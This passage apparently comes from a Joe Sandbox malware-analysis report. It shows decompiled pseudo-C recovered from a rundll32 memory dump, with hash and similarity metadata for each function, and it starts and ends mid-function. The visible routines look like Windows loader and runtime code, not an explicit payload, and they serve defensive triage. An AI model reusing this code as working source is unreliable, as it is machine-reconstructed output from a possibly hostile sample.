                                                                                                                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                                											__eflags = _t171;
                                                                                                                											if(_t171 != 0) {
                                                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                                												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                                													goto L48;
                                                                                                                												}
                                                                                                                												E044457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                                                                												goto L46;
                                                                                                                											}
                                                                                                                											L24:
                                                                                                                											__eflags = _t206;
                                                                                                                										} while (_t206 != 0);
                                                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                                                										goto L26;
                                                                                                                									}
                                                                                                                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                                                                									 *(_t237 - 0x7c) = _t232;
                                                                                                                									 *(_t232 - 4) = _t214;
                                                                                                                									 *(_t237 - 4) = _t236;
                                                                                                                									E0444F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                                                                									_t238 = _t238 + 0xc;
                                                                                                                									 *(_t237 - 4) = 0xfffffffe;
                                                                                                                									_t215 =  *(_t237 - 0x48);
                                                                                                                									__eflags = _t193;
                                                                                                                									if(_t193 < 0) {
                                                                                                                										L044277F0(_t215, _t236,  *(_t237 - 0x78));
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									__eflags =  *((char*)(_t237 - 0x39));
                                                                                                                									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                                										_t233 = E0443A44B( *(_t237 - 0x4c));
                                                                                                                										 *(_t237 - 0x50) = _t233;
                                                                                                                										__eflags = _t233;
                                                                                                                										if(_t233 == 0) {
                                                                                                                											L044277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                                                                										L17:
                                                                                                                										_t234 =  *(_t237 - 0x40);
                                                                                                                										_t218 = _t234 * 0xc;
                                                                                                                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                                                                										 *(_t218 + _t235 + 0x10) = _t236;
                                                                                                                										_t224 = _t234 + 1;
                                                                                                                										 *(_t237 - 0x40) = _t224;
                                                                                                                										 *(_t237 - 0x50) = _t224;
                                                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								 *_t235 = _t236;
                                                                                                                								_t165 = 0x10 + _t163 * 0xc;
                                                                                                                								__eflags = _t165;
                                                                                                                								_push(_t165);
                                                                                                                								_push(_t235);
                                                                                                                								_push(0x23);
                                                                                                                								_push(0xffffffff);
                                                                                                                								_t193 = E044496C0();
                                                                                                                								goto L19;
                                                                                                                							} else {
                                                                                                                								goto L50;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t235 = _t237 - 0x38;
                                                                                                                						 *(_t237 - 0x60) = _t235;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • Opcode ID: f097559cbed432dde88e74193fcba4e531406dfe23cdf7699dbdbf86429003eb
                                                                                                                • Instruction ID: 4b755c6e0c55f8fb46e327dc0a8577f347f5306e6a2c60bb1f23cf722734f26f
                                                                                                                • Opcode Fuzzy Hash: f097559cbed432dde88e74193fcba4e531406dfe23cdf7699dbdbf86429003eb
                                                                                                                • Instruction Fuzzy Hash: 46B13AB0E00209DFEF24EF99C984AAEBBB5FF45708F10452AE405AB355E774B946CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0443513A(intOrPtr __ecx, void* __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed char _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				char _v63;
                                                                                                                				char _v64;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed char* _v92;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				char _v105;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t157;
                                                                                                                				signed int _t159;
                                                                                                                				signed int _t160;
                                                                                                                				unsigned int* _t161;
                                                                                                                				intOrPtr _t165;
                                                                                                                				signed int _t172;
                                                                                                                				signed char* _t181;
                                                                                                                				intOrPtr _t189;
                                                                                                                				intOrPtr* _t200;
                                                                                                                				signed int _t202;
                                                                                                                				signed int _t203;
                                                                                                                				char _t204;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t208;
                                                                                                                				void* _t209;
                                                                                                                				intOrPtr _t210;
                                                                                                                				signed int _t212;
                                                                                                                				signed int _t214;
                                                                                                                				signed int _t221;
                                                                                                                				signed int _t222;
                                                                                                                				signed int _t226;
                                                                                                                				intOrPtr* _t232;
                                                                                                                				signed int _t233;
                                                                                                                				signed int _t234;
                                                                                                                				intOrPtr _t237;
                                                                                                                				intOrPtr _t238;
                                                                                                                				intOrPtr _t240;
                                                                                                                				void* _t245;
                                                                                                                				signed int _t246;
                                                                                                                				signed int _t247;
                                                                                                                				void* _t248;
                                                                                                                				void* _t251;
                                                                                                                				void* _t252;
                                                                                                                				signed int _t253;
                                                                                                                				signed int _t255;
                                                                                                                				signed int _t256;
                                                                                                                
                                                                                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                                                				_v8 =  *0x44fd360 ^ _t255;
                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                				_t251 = __edx;
                                                                                                                				_t237 = __ecx;
                                                                                                                				_t212 = 6;
                                                                                                                				_t245 =  &_v84;
                                                                                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                				_v48 = __ecx;
                                                                                                                				_v36 = _t207;
                                                                                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                                                				_t256 = _t255 + 0xc;
                                                                                                                				_t246 = _t245 + _t212;
                                                                                                                				if(_t207 == 2) {
                                                                                                                					_t247 =  *(_t237 + 0x60);
                                                                                                                					_t208 =  *(_t237 + 0x64);
                                                                                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                                                					_v104 = _t159;
                                                                                                                					_v76 = _t159;
                                                                                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                                                					_v100 = _t160;
                                                                                                                					_v72 = _t160;
                                                                                                                					L19:
                                                                                                                					_v80 = _t208;
                                                                                                                					_v84 = _t247;
                                                                                                                					L8:
                                                                                                                					_t214 = 0;
                                                                                                                					if( *(_t237 + 0x74) > 0) {
                                                                                                                						_t82 = _t237 + 0x84; // 0x124
                                                                                                                						_t161 = _t82;
                                                                                                                						_v92 = _t161;
                                                                                                                						while( *_t161 >> 0x1f != 0) {
                                                                                                                							_t200 = _v92;
                                                                                                                							if( *_t200 == 0x80000000) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t214 = _t214 + 1;
                                                                                                                							_t161 = _t200 + 0x10;
                                                                                                                							_v92 = _t161;
                                                                                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						_v88 = _t214 << 4;
                                                                                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                                                						_t165 = 0;
                                                                                                                						asm("adc eax, [ecx+edx+0x7c]");
                                                                                                                						_v24 = _t165;
                                                                                                                						_v28 = _v40;
                                                                                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                                                						_t221 = _v40;
                                                                                                                						_v16 =  *_v92;
                                                                                                                						_v32 =  &_v28;
                                                                                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						_t240 = _v48;
                                                                                                                						if( *_v92 != 0x80000000) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                                                                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                                                                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                                                                						_t226 = 0;
                                                                                                                						_t181 = _t251 + 0x66;
                                                                                                                						_v88 = 0;
                                                                                                                						_v92 = _t181;
                                                                                                                						do {
                                                                                                                							if( *((char*)(_t181 - 2)) == 0) {
                                                                                                                								goto L31;
                                                                                                                							}
                                                                                                                							_t226 = _v88;
                                                                                                                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                                                                								_t181 = E0444D0F0(1, _t226 + 0x20, 0);
                                                                                                                								_t226 = _v40;
                                                                                                                								 *(_t226 + 8) = _t181;
                                                                                                                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                                                                								L34:
                                                                                                                								if(_v44 == 0) {
                                                                                                                									goto L9;
                                                                                                                								}
                                                                                                                								_t210 = _v44;
                                                                                                                								_t127 = _t210 + 0x1c; // 0x1c
                                                                                                                								_t249 = _t127;
                                                                                                                								E04422280(_t181, _t127);
                                                                                                                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                                                                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                                                                								}
                                                                                                                								_t189 = L04424620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                                                                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                                                                								if(_t189 != 0) {
                                                                                                                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                                                                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                                                                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                                									 *_t232 = _t232 + 0x10;
                                                                                                                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                                                									E0444F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                                                                									_t256 = _t256 + 0xc;
                                                                                                                								}
                                                                                                                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                                                                								E0441FFB0(_t210, _t249, _t249);
                                                                                                                								_t222 = _v76;
                                                                                                                								_t172 = _v80;
                                                                                                                								_t208 = _v84;
                                                                                                                								_t247 = _v88;
                                                                                                                								L10:
                                                                                                                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                                                                								_v44 = _t238;
                                                                                                                								if(_t238 != 0) {
                                                                                                                									 *0x44fb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                                                                									_v44();
                                                                                                                								}
                                                                                                                								_pop(_t248);
                                                                                                                								_pop(_t252);
                                                                                                                								_pop(_t209);
                                                                                                                								return E0444B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                                                                							}
                                                                                                                							_t181 = _v92;
                                                                                                                							L31:
                                                                                                                							_t226 = _t226 + 1;
                                                                                                                							_t181 =  &(_t181[0x18]);
                                                                                                                							_v88 = _t226;
                                                                                                                							_v92 = _t181;
                                                                                                                						} while (_t226 < 4);
                                                                                                                						goto L34;
                                                                                                                					}
                                                                                                                					L9:
                                                                                                                					_t172 = _v104;
                                                                                                                					_t222 = _v100;
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				_t247 = _t246 | 0xffffffff;
                                                                                                                				_t208 = _t247;
                                                                                                                				_v84 = _t247;
                                                                                                                				_v80 = _t208;
                                                                                                                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                                                                					_t233 = _v72;
                                                                                                                					_v105 = _v64;
                                                                                                                					_t202 = _v76;
                                                                                                                				} else {
                                                                                                                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                                                                					_v105 = 1;
                                                                                                                					if(_v63 <= _t204) {
                                                                                                                						_v63 = _t204;
                                                                                                                					}
                                                                                                                					_t202 = _v76 |  *(_t251 + 0x40);
                                                                                                                					_t233 = _v72 |  *(_t251 + 0x44);
                                                                                                                					_t247 =  *(_t251 + 0x38);
                                                                                                                					_t208 =  *(_t251 + 0x3c);
                                                                                                                					_v76 = _t202;
                                                                                                                					_v72 = _t233;
                                                                                                                					_v84 = _t247;
                                                                                                                					_v80 = _t208;
                                                                                                                				}
                                                                                                                				_v104 = _t202;
                                                                                                                				_v100 = _t233;
                                                                                                                				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                                                                					_t237 = _v48;
                                                                                                                					_v105 = 1;
                                                                                                                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                                                                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                                                                						_t237 = _v48;
                                                                                                                					}
                                                                                                                					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                                                                					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                                                                					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                                                                					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                                                                					_v104 = _t203;
                                                                                                                					_v76 = _t203;
                                                                                                                					_v100 = _t234;
                                                                                                                					_v72 = _t234;
                                                                                                                					_v84 = _t247;
                                                                                                                					_v80 = _t208;
                                                                                                                				}
                                                                                                                				if(_v105 == 0) {
                                                                                                                					_v36 = _v36 & 0x00000000;
                                                                                                                					_t208 = 0;
                                                                                                                					_t247 = 0;
                                                                                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                                                					goto L19;
                                                                                                                				} else {
                                                                                                                					_v36 = 1;
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59af073d506f525952581da443db18c446b1fcb201271b6ef30d83859ade5c08
                                                                                                                • Instruction ID: 03cdef8b5c3d331bb03e5751b030c8d4467fef7c01276a416dc88b8f2a312b5a
                                                                                                                • Opcode Fuzzy Hash: 59af073d506f525952581da443db18c446b1fcb201271b6ef30d83859ade5c08
                                                                                                                • Instruction Fuzzy Hash: FFC132756087809FD754CF28C580A5AFBE1BF88318F148A6EF8998B352D770E846CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E044303E2(signed int __ecx, signed int __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				char _v52;
                                                                                                                				char _v56;
                                                                                                                				char _v64;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t56;
                                                                                                                				signed int _t58;
                                                                                                                				char* _t64;
                                                                                                                				intOrPtr _t65;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t79;
                                                                                                                				char* _t83;
                                                                                                                				intOrPtr _t84;
                                                                                                                				signed int _t93;
                                                                                                                				signed int _t94;
                                                                                                                				signed char* _t95;
                                                                                                                				signed int _t99;
                                                                                                                				signed int _t100;
                                                                                                                				signed char* _t101;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t119;
                                                                                                                				signed int _t120;
                                                                                                                				void* _t122;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t127;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t127;
                                                                                                                				_t119 = __ecx;
                                                                                                                				_t105 = __edx;
                                                                                                                				_t118 = 0;
                                                                                                                				_v20 = __edx;
                                                                                                                				_t120 =  *(__ecx + 0x20);
                                                                                                                				if(E04430548(__ecx, 0) != 0) {
                                                                                                                					_t56 = 0xc000022d;
                                                                                                                					L23:
                                                                                                                					return E0444B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                                                				} else {
                                                                                                                					_v12 = _v12 | 0xffffffff;
                                                                                                                					_t58 = _t120 + 0x24;
                                                                                                                					_t109 =  *(_t120 + 0x18);
                                                                                                                					_t118 = _t58;
                                                                                                                					_v16 = _t58;
                                                                                                                					E0441B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                                                					_v52 = 0x18;
                                                                                                                					_v48 = 0;
                                                                                                                					0x840 = 0x40;
                                                                                                                					if( *0x44f7c1c != 0) {
                                                                                                                					}
                                                                                                                					_v40 = 0x840;
                                                                                                                					_v44 = _t105;
                                                                                                                					_v36 = 0;
                                                                                                                					_v32 = 0;
                                                                                                                					if(E04427D50() != 0) {
                                                                                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                					} else {
                                                                                                                						_t64 = 0x7ffe0384;
                                                                                                                					}
                                                                                                                					if( *_t64 != 0) {
                                                                                                                						_t65 =  *[fs:0x30];
                                                                                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                                                							_t100 = E04427D50();
                                                                                                                							__eflags = _t100;
                                                                                                                							if(_t100 == 0) {
                                                                                                                								_t101 = 0x7ffe0385;
                                                                                                                							} else {
                                                                                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                							}
                                                                                                                							__eflags =  *_t101 & 0x00000020;
                                                                                                                							if(( *_t101 & 0x00000020) != 0) {
                                                                                                                								_t118 = _t118 | 0xffffffff;
                                                                                                                								_t109 = 0x1485;
                                                                                                                								E04487016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t105 = 0;
                                                                                                                					while(1) {
                                                                                                                						_push(0x60);
                                                                                                                						_push(5);
                                                                                                                						_push( &_v64);
                                                                                                                						_push( &_v52);
                                                                                                                						_push(0x100021);
                                                                                                                						_push( &_v12);
                                                                                                                						_t122 = E04449830();
                                                                                                                						if(_t122 >= 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t122 - 0xc0000034;
                                                                                                                						if(_t122 == 0xc0000034) {
                                                                                                                							L38:
                                                                                                                							_t120 = 0xc0000135;
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t122 - 0xc000003a;
                                                                                                                						if(_t122 == 0xc000003a) {
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                						__eflags = _t122 - 0xc0000022;
                                                                                                                						if(_t122 != 0xc0000022) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t105;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t109 = _t119;
                                                                                                                						_t99 = E044869A6(_t119, __eflags);
                                                                                                                						__eflags = _t99;
                                                                                                                						if(_t99 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t105 = _t105 + 1;
                                                                                                                					}
                                                                                                                					if( !_t120 >= 0) {
                                                                                                                						L22:
                                                                                                                						_t56 = _t120;
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                					if( *0x44f7c04 != 0) {
                                                                                                                						_t118 = _v12;
                                                                                                                						_t120 = E0448A7AC(_t119, _t118, _t109);
                                                                                                                						__eflags = _t120;
                                                                                                                						if(_t120 >= 0) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						__eflags =  *0x44f7bd8;
                                                                                                                						if( *0x44f7bd8 != 0) {
                                                                                                                							L20:
                                                                                                                							if(_v12 != 0xffffffff) {
                                                                                                                								_push(_v12);
                                                                                                                								E044495D0();
                                                                                                                							}
                                                                                                                							goto L22;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L10:
                                                                                                                					_push(_v12);
                                                                                                                					_t105 = _t119 + 0xc;
                                                                                                                					_push(0x1000000);
                                                                                                                					_push(0x10);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0xf);
                                                                                                                					_push(_t105);
                                                                                                                					_t120 = E044499A0();
                                                                                                                					if(_t120 < 0) {
                                                                                                                						__eflags = _t120 - 0xc000047e;
                                                                                                                						if(_t120 == 0xc000047e) {
                                                                                                                							L51:
                                                                                                                							_t74 = E04483540(_t120);
                                                                                                                							_t119 = _v16;
                                                                                                                							_t120 = _t74;
                                                                                                                							L52:
                                                                                                                							_t118 = 0x1485;
                                                                                                                							E0440B1E1(_t120, 0x1485, 0, _t119);
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						__eflags = _t120 - 0xc000047f;
                                                                                                                						if(_t120 == 0xc000047f) {
                                                                                                                							goto L51;
                                                                                                                						}
                                                                                                                						__eflags = _t120 - 0xc0000462;
                                                                                                                						if(_t120 == 0xc0000462) {
                                                                                                                							goto L51;
                                                                                                                						}
                                                                                                                						_t119 = _v16;
                                                                                                                						__eflags = _t120 - 0xc0000017;
                                                                                                                						if(_t120 != 0xc0000017) {
                                                                                                                							__eflags = _t120 - 0xc000009a;
                                                                                                                							if(_t120 != 0xc000009a) {
                                                                                                                								__eflags = _t120 - 0xc000012d;
                                                                                                                								if(_t120 != 0xc000012d) {
                                                                                                                									_v28 = _t119;
                                                                                                                									_push( &_v56);
                                                                                                                									_push(1);
                                                                                                                									_v24 = _t120;
                                                                                                                									_push( &_v28);
                                                                                                                									_push(1);
                                                                                                                									_push(2);
                                                                                                                									_push(0xc000007b);
                                                                                                                									_t79 = E0444AAF0();
                                                                                                                									__eflags = _t79;
                                                                                                                									if(_t79 >= 0) {
                                                                                                                										__eflags =  *0x44f8474 - 3;
                                                                                                                										if( *0x44f8474 != 3) {
                                                                                                                											 *0x44f79dc =  *0x44f79dc + 1;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L52;
                                                                                                                					}
                                                                                                                					if(E04427D50() != 0) {
                                                                                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                					} else {
                                                                                                                						_t83 = 0x7ffe0384;
                                                                                                                					}
                                                                                                                					if( *_t83 != 0) {
                                                                                                                						_t84 =  *[fs:0x30];
                                                                                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                                                							_t94 = E04427D50();
                                                                                                                							__eflags = _t94;
                                                                                                                							if(_t94 == 0) {
                                                                                                                								_t95 = 0x7ffe0385;
                                                                                                                							} else {
                                                                                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                							}
                                                                                                                							__eflags =  *_t95 & 0x00000020;
                                                                                                                							if(( *_t95 & 0x00000020) != 0) {
                                                                                                                								E04487016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                                                						if( *0x44f8708 != 0) {
                                                                                                                							_t118 =  *0x7ffe0330;
                                                                                                                							_t123 =  *0x44f7b00; // 0x0
                                                                                                                							asm("ror esi, cl");
                                                                                                                							 *0x44fb1e0(_v12, _v20, 0x20);
                                                                                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t120 =  ~_t50 & _t93;
                                                                                                                						} else {
                                                                                                                							_t120 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( !_t120 >= 0) {
                                                                                                                						L19:
                                                                                                                						_push( *_t105);
                                                                                                                						E044495D0();
                                                                                                                						 *_t105 =  *_t105 & 0x00000000;
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					_t120 = E04417F65(_t119);
                                                                                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                                                						__eflags = _t120;
                                                                                                                						if(_t120 < 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						 *(_t119 + 0x64) = _v12;
                                                                                                                						goto L22;
                                                                                                                					}
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                			}









































                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e2cdf0bbcaa32f716f53335b77060d4b1e7ddf2623b8f698a9ce22fee33a9bb
                                                                                                                • Instruction ID: cc9724e0b1539b76dd4b125787192aaa027336cb8a2480b4bd649d67f1e2c0d2
                                                                                                                • Opcode Fuzzy Hash: 0e2cdf0bbcaa32f716f53335b77060d4b1e7ddf2623b8f698a9ce22fee33a9bb
                                                                                                                • Instruction Fuzzy Hash: 39910231E00254AFFF319A69C844BBE7BA4EB05B29F054367E950AB2D2E774BD41C781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0440C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v1036;
                                                                                                                				signed int _v1040;
                                                                                                                				char _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed char _v1056;
                                                                                                                				void* _v1058;
                                                                                                                				char _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				void* _v1068;
                                                                                                                				intOrPtr _v1072;
                                                                                                                				void* _v1084;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t70;
                                                                                                                				intOrPtr _t72;
                                                                                                                				signed int _t74;
                                                                                                                				intOrPtr _t77;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t81;
                                                                                                                				void* _t101;
                                                                                                                				signed int _t102;
                                                                                                                				signed int _t107;
                                                                                                                				signed int _t109;
                                                                                                                				signed int _t110;
                                                                                                                				signed char _t111;
                                                                                                                				signed int _t112;
                                                                                                                				signed int _t113;
                                                                                                                				signed int _t114;
                                                                                                                				intOrPtr _t116;
                                                                                                                				void* _t117;
                                                                                                                				char _t118;
                                                                                                                				void* _t120;
                                                                                                                				char _t121;
                                                                                                                				signed int _t122;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t125;
                                                                                                                
                                                                                                                				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                                                                				_v8 =  *0x44fd360 ^ _t125;
                                                                                                                				_t116 = _a4;
                                                                                                                				_v1056 = _a16;
                                                                                                                				_v1040 = _a24;
                                                                                                                				if(E04416D30( &_v1048, _a8) < 0) {
                                                                                                                					L4:
                                                                                                                					_pop(_t117);
                                                                                                                					_pop(_t120);
                                                                                                                					_pop(_t101);
                                                                                                                					return E0444B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                                                                				}
                                                                                                                				_t70 = _a20;
                                                                                                                				if(_t70 >= 0x3f4) {
                                                                                                                					_t121 = _t70 + 0xc;
